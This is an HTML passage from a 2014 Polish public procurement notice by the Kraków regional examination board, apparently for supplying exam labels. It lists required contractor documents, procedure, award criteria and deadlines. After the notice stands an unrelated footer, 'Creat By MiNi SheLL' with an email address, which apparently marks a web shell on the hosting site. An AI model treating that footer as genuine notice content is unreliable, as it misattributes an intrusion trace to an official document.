<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Wykaz wykonanych usług (załącznik nr 4 do SIWZ) usług, należy dostarczyć w zakresie opisanym w pkt. VIII. 1.2 SIWZ  2. Próbka wykonywanych etykiet, zawierającej minimum 10 etykiet zadrukowanych kodami z przykładowymi danymi, zgodnie z opisem zamieszczonym w SIWZ. 3.Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy do potwierdzenia niepodlegania wykluczeniu na podstawie art.24 ust. 1 ustawy Pzp. 4.Pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia, jeżeli Wykonawca będzie polegał na wiedzy, doświadczeniu, potencjale technicznym i osobach zdolnych do wykonania zamówienia, lub zdolnościach innych podmiotów. 5.Wypełniony Formularz ofertowy zawierający wymaganą do ważności oferty treść wg wzoru przedstawionego w załączniku nr 1 do SIWZ wraz z załącznikiem nr 2 do SIWZ - Formularzem cenowym, który należy poprawnie wyliczyć. 6. Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę (w formie oryginału, lub kopii poświadczonej za zgodność z oryginałem) - jeżeli są wymagane dla ważności oferty, zgodnie z aktem rejestracyjnym, wymaganiami ustawowymi oraz przepisami prawa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie dotyczącym: a) zmian harmonogramu dostaw, co do terminu dostaw, liczby i rodzaju etykiet i miejsc dostawy b) sposobu realizacji zamówienia przez Wykonawcę, - pod warunkiem dokonania stosownych uzgodnień między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.oke.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Okręgowa Komisja Egzaminacyjna w Krakowie os. Szkolne 37, 31-978 Kraków..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2014 godzina 12:00, miejsce: Okręgowa Komisja Egzaminacyjna w Krakowie os. Szkolne 37, 31-978 Kraków..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacja dodatkowa do pkt. II.2 Termin wykonania zamówienia: -Termin wykonania zamówienia dla każdej z akcji, oznacza termin, w którym dostarczone etykiety będą dostępne do wydawania ich dla szkół przez pracowników Zamawiającego w miejscach dostawy (Punkty Odbioru Prac na terenie województwa małopolskiego, lubelskiego i podkarpackiego lub szkoły i ośrodki dla egzaminu zawodowego w sesjach innych niż letnia). - W opisie przedmiotu zamówienia określono terminy wykonania zamówienia dla poszczególnych akcji..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com